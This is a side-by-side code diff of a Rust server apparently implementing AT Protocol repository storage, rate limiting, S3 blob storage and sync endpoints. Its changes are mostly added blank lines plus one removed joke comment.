··· 40 all.into_iter().collect() 41 } 42 } 43 impl BlockStore for TrackingBlockStore { 44 async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> { 45 let result = self.inner.get(cid).await?; ··· 51 } 52 Ok(result) 53 } 54 async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> { 55 let cid = self.inner.put(data).await?; 56 match self.written_cids.lock() { ··· 59 } 60 Ok(cid) 61 } 62 async fn has(&self, cid: &Cid) -> Result<bool, RepoError> { 63 self.inner.has(cid).await 64 } 65 async fn put_many( 66 &self, 67 blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send, ··· 75 } 76 Ok(()) 77 } 78 async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> { 79 let results = self.inner.get_many(cids).await?; 80 for (cid, result) in cids.iter().zip(results.iter()) { ··· 87 } 88 Ok(results) 89 } 90 async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> { 91 self.put_many(commit.blocks).await?; 92 Ok(())
··· 6 use jacquard_repo::storage::BlockStore; 7 use std::collections::HashSet; 8 use std::sync::{Arc, Mutex}; 9 + 10 #[derive(Clone)] 11 pub struct TrackingBlockStore { 12 inner: PostgresBlockStore, 13 written_cids: Arc<Mutex<Vec<Cid>>>, 14 read_cids: Arc<Mutex<HashSet<Cid>>>, 15 } 16 + 17 impl TrackingBlockStore { 18 pub fn new(store: PostgresBlockStore) -> Self { 19 Self { ··· 22 read_cids: Arc::new(Mutex::new(HashSet::new())), 23 } 24 } 25 + 26 pub fn get_written_cids(&self) -> Vec<Cid> { 27 match self.written_cids.lock() { 28 Ok(guard) => guard.clone(), 29 Err(poisoned) => poisoned.into_inner().clone(), 30 } 31 } 32 + 33 pub fn get_read_cids(&self) -> Vec<Cid> { 34 match self.read_cids.lock() { 35 Ok(guard) => guard.iter().cloned().collect(), 36 Err(poisoned) => poisoned.into_inner().iter().cloned().collect(), 37 } 38 } 39 + 40 pub fn get_all_relevant_cids(&self) -> Vec<Cid> { 41 let written = self.get_written_cids(); 42 let read = self.get_read_cids(); ··· 45 all.into_iter().collect() 46 } 47 } 48 + 49 impl BlockStore for TrackingBlockStore { 50 async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> { 51 let result = self.inner.get(cid).await?; ··· 57 } 58 Ok(result) 59 } 60 + 61 async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> { 62 let cid = self.inner.put(data).await?; 63 match self.written_cids.lock() { ··· 66 } 67 Ok(cid) 68 } 69 + 70 async fn has(&self, cid: &Cid) -> Result<bool, RepoError> { 71 self.inner.has(cid).await 72 } 73 + 74 async fn put_many( 75 &self, 76 blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send, ··· 84 } 85 Ok(()) 86 } 87 + 88 async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> { 89 let results = self.inner.get_many(cids).await?; 90 for (cid, result) in cids.iter().zip(results.iter()) { ··· 97 } 98 Ok(results) 99 } 100 + 101 async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> { 102 self.put_many(commit.blocks).await?; 103 Ok(())
+16
src/state.rs
··· 8 use sqlx::PgPool; 9 use std::sync::Arc; 10 use tokio::sync::broadcast; 11 #[derive(Clone)] 12 pub struct AppState { 13 pub db: PgPool, ··· 19 pub cache: Arc<dyn Cache>, 20 pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>, 21 } 22 pub enum RateLimitKind { 23 Login, 24 AccountCreation, ··· 32 AppPassword, 33 EmailUpdate, 34 } 35 impl RateLimitKind { 36 fn key_prefix(&self) -> &'static str { 37 match self { ··· 48 Self::EmailUpdate => "email_update", 49 } 50 } 51 fn limit_and_window_ms(&self) -> (u32, u64) { 52 match self { 53 Self::Login => (10, 60_000), ··· 64 } 65 } 66 } 67 impl AppState { 68 pub async fn new(db: PgPool) -> Self { 69 AuthConfig::init(); 70 let block_store = PostgresBlockStore::new(db.clone()); 71 let blob_store = S3BlobStorage::new().await; 72 let firehose_buffer_size: usize = std::env::var("FIREHOSE_BUFFER_SIZE") 73 .ok() 74 .and_then(|v| v.parse().ok()) 75 .unwrap_or(10000); 76 let (firehose_tx, _) = broadcast::channel(firehose_buffer_size); 77 let rate_limiters = Arc::new(RateLimiters::new()); 78 let circuit_breakers = Arc::new(CircuitBreakers::new()); 79 let (cache, distributed_rate_limiter) = create_cache().await; 80 Self { 81 db, 82 block_store, ··· 88 distributed_rate_limiter, 89 } 90 } 91 pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self { 92 self.rate_limiters = Arc::new(rate_limiters); 93 self 94 } 95 pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self { 96 self.circuit_breakers = Arc::new(circuit_breakers); 97 self 98 } 99 pub async fn check_rate_limit(&self, kind: RateLimitKind, client_ip: &str) -> bool { 100 if std::env::var("DISABLE_RATE_LIMITING").is_ok() { 101 return true; 102 } 103 let key = format!("{}:{}", kind.key_prefix(), client_ip); 104 let limiter_name = kind.key_prefix(); 105 let (limit, window_ms) = kind.limit_and_window_ms(); 106 if !self.distributed_rate_limiter.check_rate_limit(&key, limit, window_ms).await { 107 crate::metrics::record_rate_limit_rejection(limiter_name); 108 return false; 109 } 110 let limiter = match kind { 111 RateLimitKind::Login => &self.rate_limiters.login, 112 RateLimitKind::AccountCreation => &self.rate_limiters.account_creation, ··· 120 RateLimitKind::AppPassword => &self.rate_limiters.app_password, 121 RateLimitKind::EmailUpdate => &self.rate_limiters.email_update, 122 }; 123 let ok = limiter.check_key(&client_ip.to_string()).is_ok(); 124 if !ok { 125 crate::metrics::record_rate_limit_rejection(limiter_name);
··· 8 use sqlx::PgPool; 9 use std::sync::Arc; 10 use tokio::sync::broadcast; 11 + 12 #[derive(Clone)] 13 pub struct AppState { 14 pub db: PgPool, ··· 20 pub cache: Arc<dyn Cache>, 21 pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>, 22 } 23 + 24 pub enum RateLimitKind { 25 Login, 26 AccountCreation, ··· 34 AppPassword, 35 EmailUpdate, 36 } 37 + 38 impl RateLimitKind { 39 fn key_prefix(&self) -> &'static str { 40 match self { ··· 51 Self::EmailUpdate => "email_update", 52 } 53 } 54 + 55 fn limit_and_window_ms(&self) -> (u32, u64) { 56 match self { 57 Self::Login => (10, 60_000), ··· 68 } 69 } 70 } 71 + 72 impl AppState { 73 pub async fn new(db: PgPool) -> Self { 74 AuthConfig::init(); 75 + 76 let block_store = PostgresBlockStore::new(db.clone()); 77 let blob_store = S3BlobStorage::new().await; 78 + 79 let firehose_buffer_size: usize = std::env::var("FIREHOSE_BUFFER_SIZE") 80 .ok() 81 .and_then(|v| v.parse().ok()) 82 .unwrap_or(10000); 83 + 84 let (firehose_tx, _) = broadcast::channel(firehose_buffer_size); 85 let rate_limiters = Arc::new(RateLimiters::new()); 86 let circuit_breakers = Arc::new(CircuitBreakers::new()); 87 let (cache, distributed_rate_limiter) = create_cache().await; 88 + 89 Self { 90 db, 91 block_store, ··· 97 distributed_rate_limiter, 98 } 99 } 100 + 101 pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self { 102 self.rate_limiters = Arc::new(rate_limiters); 103 self 104 } 105 + 106 pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self { 107 self.circuit_breakers = Arc::new(circuit_breakers); 108 self 109 } 110 + 111 pub async fn check_rate_limit(&self, kind: RateLimitKind, client_ip: &str) -> bool { 112 if std::env::var("DISABLE_RATE_LIMITING").is_ok() { 113 return true; 114 } 115 + 116 let key = format!("{}:{}", kind.key_prefix(), client_ip); 117 let limiter_name = kind.key_prefix(); 118 let (limit, window_ms) = kind.limit_and_window_ms(); 119 + 120 if !self.distributed_rate_limiter.check_rate_limit(&key, limit, window_ms).await { 121 crate::metrics::record_rate_limit_rejection(limiter_name); 122 return false; 123 } 124 + 125 let limiter = match kind { 126 RateLimitKind::Login => &self.rate_limiters.login, 127 RateLimitKind::AccountCreation => &self.rate_limiters.account_creation, ··· 135 RateLimitKind::AppPassword => &self.rate_limiters.app_password, 136 RateLimitKind::EmailUpdate => &self.rate_limiters.email_update, 137 }; 138 + 139 let ok = limiter.check_key(&client_ip.to_string()).is_ok(); 140 if !ok { 141 crate::metrics::record_rate_limit_rejection(limiter_name);
+19 -1
src/storage/mod.rs
··· 5 use aws_sdk_s3::primitives::ByteStream; 6 use bytes::Bytes; 7 use thiserror::Error; 8 #[derive(Error, Debug)] 9 pub enum StorageError { 10 #[error("IO error: {0}")] ··· 14 #[error("Other: {0}")] 15 Other(String), 16 } 17 #[async_trait] 18 pub trait BlobStorage: Send + Sync { 19 async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError>; ··· 22 async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError>; 23 async fn delete(&self, key: &str) -> Result<(), StorageError>; 24 } 25 pub struct S3BlobStorage { 26 client: Client, 27 bucket: String, 28 } 29 impl S3BlobStorage { 30 pub async fn new() -> Self { 31 - // heheheh 32 let region_provider = RegionProviderChain::default_provider().or_else("us-east-1"); 33 let config = aws_config::defaults(BehaviorVersion::latest()) 34 .region(region_provider) 35 .load() 36 .await; 37 let bucket = std::env::var("S3_BUCKET").expect("S3_BUCKET must be set"); 38 let client = if let Ok(endpoint) = std::env::var("S3_ENDPOINT") { 39 let s3_config = aws_sdk_s3::config::Builder::from(&config) 40 .endpoint_url(endpoint) ··· 44 } else { 45 Client::new(&config) 46 }; 47 Self { client, bucket } 48 } 49 } 50 #[async_trait] 51 impl BlobStorage for S3BlobStorage { 52 async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError> { 53 self.put_bytes(key, Bytes::copy_from_slice(data)).await 54 } 55 async fn put_bytes(&self, key: &str, data: Bytes) -> Result<(), StorageError> { 56 let result = self.client 57 .put_object() ··· 61 .send() 62 .await 63 .map_err(|e| StorageError::S3(e.to_string())); 64 match &result { 65 Ok(_) => crate::metrics::record_s3_operation("put", "success"), 66 Err(_) => crate::metrics::record_s3_operation("put", "error"), 67 } 68 result?; 69 Ok(()) 70 } 71 async fn get(&self, key: &str) -> Result<Vec<u8>, StorageError> { 72 self.get_bytes(key).await.map(|b| b.to_vec()) 73 } 74 async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError> { 75 let resp = self 76 .client ··· 83 crate::metrics::record_s3_operation("get", "error"); 84 StorageError::S3(e.to_string()) 85 })?; 86 let data = resp 87 .body 88 .collect() ··· 92 StorageError::S3(e.to_string()) 93 })? 94 .into_bytes(); 95 crate::metrics::record_s3_operation("get", "success"); 96 Ok(data) 97 } 98 async fn delete(&self, key: &str) -> Result<(), StorageError> { 99 let result = self.client 100 .delete_object() ··· 103 .send() 104 .await 105 .map_err(|e| StorageError::S3(e.to_string())); 106 match &result { 107 Ok(_) => crate::metrics::record_s3_operation("delete", "success"), 108 Err(_) => crate::metrics::record_s3_operation("delete", "error"), 109 } 110 result?; 111 Ok(()) 112 }
··· 5 use aws_sdk_s3::primitives::ByteStream; 6 use bytes::Bytes; 7 use thiserror::Error; 8 + 9 #[derive(Error, Debug)] 10 pub enum StorageError { 11 #[error("IO error: {0}")] ··· 15 #[error("Other: {0}")] 16 Other(String), 17 } 18 + 19 #[async_trait] 20 pub trait BlobStorage: Send + Sync { 21 async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError>; ··· 24 async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError>; 25 async fn delete(&self, key: &str) -> Result<(), StorageError>; 26 } 27 + 28 pub struct S3BlobStorage { 29 client: Client, 30 bucket: String, 31 } 32 + 33 impl S3BlobStorage { 34 pub async fn new() -> Self { 35 let region_provider = RegionProviderChain::default_provider().or_else("us-east-1"); 36 + 37 let config = aws_config::defaults(BehaviorVersion::latest()) 38 .region(region_provider) 39 .load() 40 .await; 41 + 42 let bucket = std::env::var("S3_BUCKET").expect("S3_BUCKET must be set"); 43 + 44 let client = if let Ok(endpoint) = std::env::var("S3_ENDPOINT") { 45 let s3_config = aws_sdk_s3::config::Builder::from(&config) 46 .endpoint_url(endpoint) ··· 50 } else { 51 Client::new(&config) 52 }; 53 + 54 Self { client, bucket } 55 } 56 } 57 + 58 #[async_trait] 59 impl BlobStorage for S3BlobStorage { 60 async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError> { 61 self.put_bytes(key, Bytes::copy_from_slice(data)).await 62 } 63 + 64 async fn put_bytes(&self, key: &str, data: Bytes) -> Result<(), StorageError> { 65 let result = self.client 66 .put_object() ··· 70 .send() 71 .await 72 .map_err(|e| StorageError::S3(e.to_string())); 73 + 74 match &result { 75 Ok(_) => crate::metrics::record_s3_operation("put", "success"), 76 Err(_) => crate::metrics::record_s3_operation("put", "error"), 77 } 78 + 79 result?; 80 Ok(()) 81 } 82 + 83 async fn get(&self, key: &str) -> Result<Vec<u8>, StorageError> { 84 self.get_bytes(key).await.map(|b| b.to_vec()) 85 } 86 + 87 async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError> { 88 let resp = self 89 .client ··· 96 crate::metrics::record_s3_operation("get", "error"); 97 StorageError::S3(e.to_string()) 98 })?; 99 + 100 let data = resp 101 .body 102 .collect() ··· 106 StorageError::S3(e.to_string()) 107 })? 108 .into_bytes(); 109 + 110 crate::metrics::record_s3_operation("get", "success"); 111 Ok(data) 112 } 113 + 114 async fn delete(&self, key: &str) -> Result<(), StorageError> { 115 let result = self.client 116 .delete_object() ··· 119 .send() 120 .await 121 .map_err(|e| StorageError::S3(e.to_string())); 122 + 123 match &result { 124 Ok(_) => crate::metrics::record_s3_operation("delete", "success"), 125 Err(_) => crate::metrics::record_s3_operation("delete", "error"), 126 } 127 + 128 result?; 129 Ok(()) 130 }
+5
src/sync/blob.rs
··· 10 use serde::{Deserialize, Serialize}; 11 use serde_json::json; 12 use tracing::error; 13 #[derive(Deserialize)] 14 pub struct GetBlobParams { 15 pub did: String, 16 pub cid: String, 17 } 18 pub async fn get_blob( 19 State(state): State<AppState>, 20 Query(params): Query<GetBlobParams>, ··· 94 } 95 } 96 } 97 #[derive(Deserialize)] 98 pub struct ListBlobsParams { 99 pub did: String, ··· 101 pub limit: Option<i64>, 102 pub cursor: Option<String>, 103 } 104 #[derive(Serialize)] 105 pub struct ListBlobsOutput { 106 pub cursor: Option<String>, 107 pub cids: Vec<String>, 108 } 109 pub async fn list_blobs( 110 State(state): State<AppState>, 111 Query(params): Query<ListBlobsParams>,
··· 10 use serde::{Deserialize, Serialize}; 11 use serde_json::json; 12 use tracing::error; 13 + 14 #[derive(Deserialize)] 15 pub struct GetBlobParams { 16 pub did: String, 17 pub cid: String, 18 } 19 + 20 pub async fn get_blob( 21 State(state): State<AppState>, 22 Query(params): Query<GetBlobParams>, ··· 96 } 97 } 98 } 99 + 100 #[derive(Deserialize)] 101 pub struct ListBlobsParams { 102 pub did: String, ··· 104 pub limit: Option<i64>, 105 pub cursor: Option<String>, 106 } 107 + 108 #[derive(Serialize)] 109 pub struct ListBlobsOutput { 110 pub cursor: Option<String>, 111 pub cids: Vec<String>, 112 } 113 + 114 pub async fn list_blobs( 115 State(state): State<AppState>, 116 Query(params): Query<ListBlobsParams>,
+3
src/sync/car.rs
··· 1 use cid::Cid; 2 use iroh_car::CarHeader; 3 use std::io::Write; 4 pub fn write_varint<W: Write>(mut writer: W, mut value: u64) -> std::io::Result<()> { 5 loop { 6 let mut byte = (value & 0x7F) as u8; ··· 15 } 16 Ok(()) 17 } 18 pub fn ld_write<W: Write>(mut writer: W, data: &[u8]) -> std::io::Result<()> { 19 write_varint(&mut writer, data.len() as u64)?; 20 writer.write_all(data)?; 21 Ok(()) 22 } 23 pub fn encode_car_header(root_cid: &Cid) -> Result<Vec<u8>, String> { 24 let header = CarHeader::new_v1(vec![root_cid.clone()]); 25 let header_cbor = header.encode().map_err(|e| format!("Failed to encode CAR header: {:?}", e))?;
··· 1 use cid::Cid; 2 use iroh_car::CarHeader; 3 use std::io::Write; 4 + 5 pub fn write_varint<W: Write>(mut writer: W, mut value: u64) -> std::io::Result<()> { 6 loop { 7 let mut byte = (value & 0x7F) as u8; ··· 16 } 17 Ok(()) 18 } 19 + 20 pub fn ld_write<W: Write>(mut writer: W, data: &[u8]) -> std::io::Result<()> { 21 write_varint(&mut writer, data.len() as u64)?; 22 writer.write_all(data)?; 23 Ok(()) 24 } 25 + 26 pub fn encode_car_header(root_cid: &Cid) -> Result<Vec<u8>, String> { 27 let header = CarHeader::new_v1(vec![root_cid.clone()]); 28 let header_cbor = header.encode().map_err(|e| format!("Failed to encode CAR header: {:?}", e))?;
+11
src/sync/commit.rs
··· 12 use serde_json::json; 13 use std::str::FromStr; 14 use tracing::error; 15 async fn get_rev_from_commit(state: &AppState, cid_str: &str) -> Option<String> { 16 let cid = Cid::from_str(cid_str).ok()?; 17 let block = state.block_store.get(&cid).await.ok()??; 18 let commit = Commit::from_cbor(&block).ok()?; 19 Some(commit.rev().to_string()) 20 } 21 #[derive(Deserialize)] 22 pub struct GetLatestCommitParams { 23 pub did: String, 24 } 25 #[derive(Serialize)] 26 pub struct GetLatestCommitOutput { 27 pub cid: String, 28 pub rev: String, 29 } 30 pub async fn get_latest_commit( 31 State(state): State<AppState>, 32 Query(params): Query<GetLatestCommitParams>, ··· 78 } 79 } 80 } 81 #[derive(Deserialize)] 82 pub struct ListReposParams { 83 pub limit: Option<i64>, 84 pub cursor: Option<String>, 85 } 86 #[derive(Serialize)] 87 #[serde(rename_all = "camelCase")] 88 pub struct RepoInfo { ··· 91 pub rev: String, 92 pub active: bool, 93 } 94 #[derive(Serialize)] 95 pub struct ListReposOutput { 96 pub cursor: Option<String>, 97 pub repos: Vec<RepoInfo>, 98 } 99 pub async fn list_repos( 100 State(state): State<AppState>, 101 Query(params): Query<ListReposParams>, ··· 154 } 155 } 156 } 157 #[derive(Deserialize)] 158 pub struct GetRepoStatusParams { 159 pub did: String, 160 } 161 #[derive(Serialize)] 162 pub struct GetRepoStatusOutput { 163 pub did: String, 164 pub active: bool, 165 pub rev: Option<String>, 166 } 167 pub async fn get_repo_status( 168 State(state): State<AppState>, 169 Query(params): Query<GetRepoStatusParams>,
··· 12 use serde_json::json; 13 use std::str::FromStr; 14 use tracing::error; 15 + 16 async fn get_rev_from_commit(state: &AppState, cid_str: &str) -> Option<String> { 17 let cid = Cid::from_str(cid_str).ok()?; 18 let block = state.block_store.get(&cid).await.ok()??; 19 let commit = Commit::from_cbor(&block).ok()?; 20 Some(commit.rev().to_string()) 21 } 22 + 23 #[derive(Deserialize)] 24 pub struct GetLatestCommitParams { 25 pub did: String, 26 } 27 + 28 #[derive(Serialize)] 29 pub struct GetLatestCommitOutput { 30 pub cid: String, 31 pub rev: String, 32 } 33 + 34 pub async fn get_latest_commit( 35 State(state): State<AppState>, 36 Query(params): Query<GetLatestCommitParams>, ··· 82 } 83 } 84 } 85 + 86 #[derive(Deserialize)] 87 pub struct ListReposParams { 88 pub limit: Option<i64>, 89 pub cursor: Option<String>, 90 } 91 + 92 #[derive(Serialize)] 93 #[serde(rename_all = "camelCase")] 94 pub struct RepoInfo { ··· 97 pub rev: String, 98 pub active: bool, 99 } 100 + 101 #[derive(Serialize)] 102 pub struct ListReposOutput { 103 pub cursor: Option<String>, 104 pub repos: Vec<RepoInfo>, 105 } 106 + 107 pub async fn list_repos( 108 State(state): State<AppState>, 109 Query(params): Query<ListReposParams>, ··· 162 } 163 } 164 } 165 + 166 #[derive(Deserialize)] 167 pub struct GetRepoStatusParams { 168 pub did: String, 169 } 170 + 171 #[derive(Serialize)] 172 pub struct GetRepoStatusOutput { 173 pub did: String, 174 pub active: bool, 175 pub rev: Option<String>, 176 } 177 + 178 pub async fn get_repo_status( 179 State(state): State<AppState>, 180 Query(params): Query<GetRepoStatusParams>,
+4
src/sync/crawl.rs
··· 8 use serde::Deserialize; 9 use serde_json::json; 10 use tracing::info; 11 #[derive(Deserialize)] 12 pub struct NotifyOfUpdateParams { 13 pub hostname: String, 14 } 15 pub async fn notify_of_update( 16 State(_state): State<AppState>, 17 Query(params): Query<NotifyOfUpdateParams>, ··· 19 info!("Received notifyOfUpdate from hostname: {}", params.hostname); 20 (StatusCode::OK, Json(json!({}))).into_response() 21 } 22 #[derive(Deserialize)] 23 pub struct RequestCrawlInput { 24 pub hostname: String, 25 } 26 pub async fn request_crawl( 27 State(_state): State<AppState>, 28 Json(input): Json<RequestCrawlInput>,
··· 8 use serde::Deserialize; 9 use serde_json::json; 10 use tracing::info; 11 + 12 #[derive(Deserialize)] 13 pub struct NotifyOfUpdateParams { 14 pub hostname: String, 15 } 16 + 17 pub async fn notify_of_update( 18 State(_state): State<AppState>, 19 Query(params): Query<NotifyOfUpdateParams>, ··· 21 info!("Received notifyOfUpdate from hostname: {}", params.hostname); 22 (StatusCode::OK, Json(json!({}))).into_response() 23 } 24 + 25 #[derive(Deserialize)] 26 pub struct RequestCrawlInput { 27 pub hostname: String, 28 } 29 + 30 pub async fn request_crawl( 31 State(_state): State<AppState>, 32 Json(input): Json<RequestCrawlInput>,
+7
src/sync/deprecated.rs
··· 14 use std::io::Write; 15 use std::str::FromStr; 16 use tracing::error; 17 const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000; 18 #[derive(Deserialize)] 19 pub struct GetHeadParams { 20 pub did: String, 21 } 22 #[derive(Serialize)] 23 pub struct GetHeadOutput { 24 pub root: String, 25 } 26 pub async fn get_head( 27 State(state): State<AppState>, 28 Query(params): Query<GetHeadParams>, ··· 63 } 64 } 65 } 66 #[derive(Deserialize)] 67 pub struct GetCheckoutParams { 68 pub did: String, 69 } 70 pub async fn get_checkout( 71 State(state): State<AppState>, 72 Query(params): Query<GetCheckoutParams>, ··· 168 ) 169 .into_response() 170 } 171 fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) { 172 match value { 173 Ipld::Link(cid) => {
··· 14 use std::io::Write; 15 use std::str::FromStr; 16 use tracing::error; 17 + 18 const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000; 19 + 20 #[derive(Deserialize)] 21 pub struct GetHeadParams { 22 pub did: String, 23 } 24 + 25 #[derive(Serialize)] 26 pub struct GetHeadOutput { 27 pub root: String, 28 } 29 + 30 pub async fn get_head( 31 State(state): State<AppState>, 32 Query(params): Query<GetHeadParams>, ··· 67 } 68 } 69 } 70 + 71 #[derive(Deserialize)] 72 pub struct GetCheckoutParams { 73 pub did: String, 74 } 75 + 76 pub async fn get_checkout( 77 State(state): State<AppState>, 78 Query(params): Query<GetCheckoutParams>, ··· 174 ) 175 .into_response() 176 } 177 + 178 fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) { 179 match value { 180 Ipld::Link(cid) => {
+1
src/sync/firehose.rs
··· 1 use serde::{Deserialize, Serialize}; 2 use serde_json::Value; 3 use chrono::{DateTime, Utc}; 4 #[derive(Debug, Clone, Serialize, Deserialize)] 5 pub struct SequencedEvent { 6 pub seq: i64,
··· 1 use serde::{Deserialize, Serialize}; 2 use serde_json::Value; 3 use chrono::{DateTime, Utc}; 4 + 5 #[derive(Debug, Clone, Serialize, Deserialize)] 6 pub struct SequencedEvent { 7 pub seq: i64,
+13
src/sync/frame.rs
··· 2 use serde::{Deserialize, Serialize}; 3 use std::str::FromStr; 4 use crate::sync::firehose::SequencedEvent; 5 #[derive(Debug, Serialize, Deserialize)] 6 pub struct FrameHeader { 7 pub op: i64, 8 pub t: String, 9 } 10 #[derive(Debug, Serialize, Deserialize)] 11 pub struct CommitFrame { 12 pub seq: i64, ··· 25 #[serde(rename = "prevData", skip_serializing_if = "Option::is_none")] 26 pub prev_data: Option<Cid>, 27 } 28 #[derive(Debug, Clone, Serialize, Deserialize)] 29 struct JsonRepoOp { 30 action: String, ··· 32 cid: Option<String>, 33 prev: Option<String>, 34 } 35 #[derive(Debug, Serialize, Deserialize)] 36 pub struct RepoOp { 37 pub action: String, ··· 40 #[serde(skip_serializing_if = "Option::is_none")] 41 pub prev: Option<Cid>, 42 } 43 #[derive(Debug, Serialize, Deserialize)] 44 pub struct IdentityFrame { 45 pub did: String, ··· 48 pub seq: i64, 49 pub time: String, 50 } 51 #[derive(Debug, Serialize, Deserialize)] 52 pub struct AccountFrame { 53 pub did: String, ··· 57 pub seq: i64, 58 pub time: String, 59 } 60 #[derive(Debug, Serialize, Deserialize)] 61 pub struct SyncFrame { 62 pub did: String, ··· 66 pub seq: i64, 67 pub time: String, 68 } 69 pub struct CommitFrameBuilder { 70 pub seq: i64, 71 pub did: String, ··· 75 pub blobs: Vec<String>, 76 pub time: chrono::DateTime<chrono::Utc>, 77 } 78 impl CommitFrameBuilder { 79 pub fn build(self) -> Result<CommitFrame, &'static str> { 80 let commit_cid = Cid::from_str(&self.commit_cid_str) ··· 109 }) 110 } 111 } 112 fn placeholder_rev() -> String { 113 use jacquard::types::{integer::LimitedU32, string::Tid}; 114 Tid::now(LimitedU32::MIN).to_string() 115 } 116 fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String { 117 dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string() 118 } 119 impl TryFrom<SequencedEvent> for CommitFrame { 120 type Error = &'static str; 121 fn try_from(event: SequencedEvent) -> Result<Self, Self::Error> { 122 let builder = CommitFrameBuilder { 123 seq: event.seq,
··· 2 use serde::{Deserialize, Serialize}; 3 use std::str::FromStr; 4 use crate::sync::firehose::SequencedEvent; 5 + 6 #[derive(Debug, Serialize, Deserialize)] 7 pub struct FrameHeader { 8 pub op: i64, 9 pub t: String, 10 } 11 + 12 #[derive(Debug, Serialize, Deserialize)] 13 pub struct CommitFrame { 14 pub seq: i64, ··· 27 #[serde(rename = "prevData", skip_serializing_if = "Option::is_none")] 28 pub prev_data: Option<Cid>, 29 } 30 + 31 #[derive(Debug, Clone, Serialize, Deserialize)] 32 struct JsonRepoOp { 33 action: String, ··· 35 cid: Option<String>, 36 prev: Option<String>, 37 } 38 + 39 #[derive(Debug, Serialize, Deserialize)] 40 pub struct RepoOp { 41 pub action: String, ··· 44 #[serde(skip_serializing_if = "Option::is_none")] 45 pub prev: Option<Cid>, 46 } 47 + 48 #[derive(Debug, Serialize, Deserialize)] 49 pub struct IdentityFrame { 50 pub did: String, ··· 53 pub seq: i64, 54 pub time: String, 55 } 56 + 57 #[derive(Debug, Serialize, Deserialize)] 58 pub struct AccountFrame { 59 pub did: String, ··· 63 pub seq: i64, 64 pub time: String, 65 } 66 + 67 #[derive(Debug, Serialize, Deserialize)] 68 pub struct SyncFrame { 69 pub did: String, ··· 73 pub seq: i64, 74 pub time: String, 75 } 76 + 77 pub struct CommitFrameBuilder { 78 pub seq: i64, 79 pub did: String, ··· 83 pub blobs: Vec<String>, 84 pub time: chrono::DateTime<chrono::Utc>, 85 } 86 + 87 impl CommitFrameBuilder { 88 pub fn build(self) -> Result<CommitFrame, &'static str> { 89 let commit_cid = Cid::from_str(&self.commit_cid_str) ··· 118 }) 119 } 120 } 121 + 122 fn placeholder_rev() -> String { 123 use jacquard::types::{integer::LimitedU32, string::Tid}; 124 Tid::now(LimitedU32::MIN).to_string() 125 } 126 + 127 fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String { 128 dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string() 129 } 130 + 131 impl TryFrom<SequencedEvent> for CommitFrame { 132 type Error = &'static str; 133 + 134 fn try_from(event: SequencedEvent) -> Result<Self, Self::Error> { 135 let builder = CommitFrameBuilder { 136 seq: event.seq,
+15
src/sync/import.rs
··· 9 use thiserror::Error; 10 use tracing::debug; 11 use uuid::Uuid; 12 #[derive(Error, Debug)] 13 pub enum ImportError { 14 #[error("CAR parsing error: {0}")] ··· 36 #[error("DID mismatch: CAR is for {car_did}, but authenticated as {auth_did}")] 37 DidMismatch { car_did: String, auth_did: String }, 38 } 39 #[derive(Debug, Clone)] 40 pub struct BlobRef { 41 pub cid: String, 42 pub mime_type: Option<String>, 43 } 44 pub async fn parse_car(data: &[u8]) -> Result<(Cid, HashMap<Cid, Bytes>), ImportError> { 45 let cursor = Cursor::new(data); 46 let mut reader = CarReader::new(cursor) ··· 61 } 62 Ok((root, blocks)) 63 } 64 pub fn find_blob_refs_ipld(value: &Ipld, depth: usize) -> Vec<BlobRef> { 65 if depth > 32 { 66 return vec![]; ··· 91 _ => vec![], 92 } 93 } 94 pub fn find_blob_refs(value: &JsonValue, depth: usize) -> Vec<BlobRef> { 95 if depth > 32 { 96 return vec![]; ··· 124 _ => vec![], 125 } 126 } 127 pub fn extract_links(value: &Ipld, links: &mut Vec<Cid>) { 128 match value { 129 Ipld::Link(cid) => { ··· 142 _ => {} 143 } 144 } 145 #[derive(Debug)] 146 pub struct ImportedRecord { 147 pub collection: String, ··· 149 pub cid: Cid, 150 pub blob_refs: Vec<BlobRef>, 151 } 152 pub fn walk_mst( 153 blocks: &HashMap<Cid, Bytes>, 154 root_cid: &Cid, ··· 219 } 220 Ok(records) 221 } 222 pub struct CommitInfo { 223 pub rev: Option<String>, 224 pub prev: Option<String>, 225 } 226 fn extract_commit_info(commit: &Ipld) -> Result<(Cid, CommitInfo), ImportError> { 227 let obj = match commit { 228 Ipld::Map(m) => m, ··· 250 }); 251 Ok((data_cid, CommitInfo { rev, prev })) 252 } 253 pub async fn apply_import( 254 db: &PgPool, 255 user_id: Uuid, ··· 344 ); 345 Ok(records) 346 } 347 #[cfg(test)] 348 mod tests { 349 use super::*; 350 #[test] 351 fn test_find_blob_refs() { 352 let record = serde_json::json!({ ··· 377 ); 378 assert_eq!(blob_refs[0].mime_type, Some("image/jpeg".to_string())); 379 } 380 #[test] 381 fn test_find_blob_refs_no_blobs() { 382 let record = 